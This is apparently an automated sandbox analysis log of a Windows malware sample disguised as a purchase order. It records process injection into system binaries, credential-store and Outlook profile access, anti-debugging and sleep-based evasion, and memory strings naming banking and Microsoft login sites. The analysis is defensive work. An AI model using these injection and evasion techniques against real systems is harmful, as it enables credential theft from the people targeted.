            Source: C:\Users\user\Desktop\PO# Q919240.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO# Q919240.exe"
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO# Q919240.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO# Q919240.exe"Jump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: PO# Q919240.exeStatic file information: File size 1412827 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fALrZoEgBHis.exe, 00000003.00000000.1576220938.00000000005EE000.00000002.00000001.01000000.00000004.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2705527345.00000000005EE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO# Q919240.exe, 00000000.00000003.1456302467.0000000004790000.00000004.00001000.00020000.00000000.sdmp, PO# Q919240.exe, 00000000.00000003.1456163573.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1558405527.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1666097981.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1556481442.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1666097981.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1665886213.00000000036E0000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2709007142.0000000003A40000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2709007142.0000000003BDE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1668169113.0000000003896000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO# Q919240.exe, 00000000.00000003.1456302467.0000000004790000.00000004.00001000.00020000.00000000.sdmp, PO# Q919240.exe, 00000000.00000003.1456163573.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1558405527.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1666097981.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1556481442.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1666097981.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000005.00000003.1665886213.00000000036E0000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2709007142.0000000003A40000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2709007142.0000000003BDE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1668169113.0000000003896000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.1633897813.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1665876167.0000000003200000.00000004.00000020.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000003.00000003.1606402331.000000000068B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000005.00000002.2710234659.000000000406C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2706051266.00000000035EE000.00000004.00000020.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2707985910.0000000002F9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2063649415.000000003BBCC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000005.00000002.2710234659.000000000406C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2706051266.00000000035EE000.00000004.00000020.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2707985910.0000000002F9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2063649415.000000003BBCC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.1633897813.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1665876167.0000000003200000.00000004.00000020.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000003.00000003.1606402331.000000000068B000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress
            Source: PO# Q919240.exe | Static PE information: real checksum: 0xa961f should be: 0x1617b3
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403060 push eax; ret 2_2_00403062
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004160FC push 00000030h; retf 2_2_00416149
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041789B push C5503231h; retf 2_2_004178A3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041613C push 00000030h; retf 2_2_00416149
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040D211 pushad ; ret 2_2_0040D212
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004132A3 push esi; ret 2_2_004132A8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041136F push edi; retf 2_2_00411372
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417CFB push 789F05E2h; iretd 2_2_00417D02
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004135D8 push ds; retf 2_2_004135F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004135E3 push ds; retf 2_2_004135F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00414594 push edi; retf 2_2_004145B7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E67B push ebp; retf 2_2_0041E67D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E61E push eax; retf 2_2_0041E647
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E6DA pushad ; ret 2_2_0041E6DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004016F6 push ss; ret 2_2_00401859
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417FCB push edx; iretd 2_2_00417FCD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401FF6 push ecx; ret 2_2_00401FFF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0390225F pushad ; ret 2_2_039027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039027FA pushad ; ret 2_2_039027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039309AD push ecx; mov dword ptr [esp], ecx 2_2_039309B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0390283D push eax; iretd 2_2_03902858
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03901368 push eax; iretd 2_2_03901369
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03A709AD push ecx; mov dword ptr [esp], ecx 5_2_03A709B6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_032FE30C push edi; retf 5_2_032FE30F
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03300240 push esi; ret 5_2_03300245
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0331452B push ds; iretd 5_2_0331454B
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03300575 push ds; retf 5_2_0330058D
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03300580 push ds; retf 5_2_0330058D
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03304838 push C5503231h; retf 5_2_03304840
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03304F68 push edx; iretd 5_2_03304F6A
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\PO# Q919240.exe | API/Special instruction interceptor: Address: 4265294
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFB2CECD324
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFB2CECD7E4
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFB2CECD944
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFB2CECD504
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFB2CECD544
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFB2CECD1E4
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFB2CED0154
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFB2CECDA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397096E rdtsc
            Source: C:\Windows\SysWOW64\netbtugc.exe | Window / User API: threadDelayed 9833
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-87540
            Source: C:\Users\user\Desktop\PO# Q919240.exe | API coverage: 3.3 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe | API coverage: 2.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 432 | Thread sleep count: 140 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 432 | Thread sleep time: -280000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 432 | Thread sleep count: 9833 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 432 | Thread sleep time: -19666000s >= -30000s
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe TID: 6944 | Thread sleep time: -40000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0330C2C0 FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary
            Source: 01194HH4.5.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: 01194HH4.5.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: 01194HH4.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: 01194HH4.5.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: 01194HH4.5.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: netbtugc.exe, 00000005.00000002.2711918868.0000000008604000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware20,1169649
            Source: 01194HH4.5.dr | Binary or memory string: outlook.office.comVMware20,11696492231s
            Source: 01194HH4.5.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: 01194HH4.5.dr | Binary or memory string: AMC password management pageVMware20,11696492231
            Source: 01194HH4.5.dr | Binary or memory string: interactivebrokers.comVMware20,11696492231
            Source: 01194HH4.5.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: 01194HH4.5.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: 01194HH4.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: 01194HH4.5.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: 01194HH4.5.dr | Binary or memory string: outlook.office365.comVMware20,11696492231t
            Source: 01194HH4.5.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: 01194HH4.5.dr | Binary or memory string: discord.comVMware20,11696492231f
            Source: firefox.exe, 0000000A.00000002.2065216598.0000024B3BABC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllEE
            Source: 01194HH4.5.dr | Binary or memory string: global block list test formVMware20,11696492231
            Source: 01194HH4.5.dr | Binary or memory string: dev.azure.comVMware20,11696492231j
            Source: 01194HH4.5.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: 01194HH4.5.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: 01194HH4.5.dr | Binary or memory string: bankofamerica.comVMware20,11696492231x
            Source: 01194HH4.5.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: 01194HH4.5.dr | Binary or memory string: tasks.office.comVMware20,11696492231o
            Source: netbtugc.exe, 00000005.00000002.2706051266.00000000035EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
            Source: 01194HH4.5.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: 01194HH4.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: fALrZoEgBHis.exe, 00000006.00000002.2707216223.000000000112F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
            Source: 01194HH4.5.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: 01194HH4.5.dr | Binary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: netbtugc.exe, 00000005.00000002.2711918868.0000000008604000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: pageVMware20,116
            Source: 01194HH4.5.dr | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: 01194HH4.5.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: 01194HH4.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: 01194HH4.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: C:\Users\user\Desktop\PO# Q919240.exeAPI call chain: ExitProcess graph end nodegraph_0-86663
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004172B3 LdrLoadDll,2_2_004172B3
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_04265500 mov eax, dword ptr fs:[00000030h]0_2_04265500
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_04265560 mov eax, dword ptr fs:[00000030h]0_2_04265560
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_04263ED0 mov eax, dword ptr fs:[00000030h]0_2_04263ED0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov ecx, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC3CD mov eax, dword ptr fs:[00000030h]2_2_039EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B63C0 mov eax, dword ptr fs:[00000030h]2_2_039B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039663FF mov eax, dword ptr fs:[00000030h]2_2_039663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
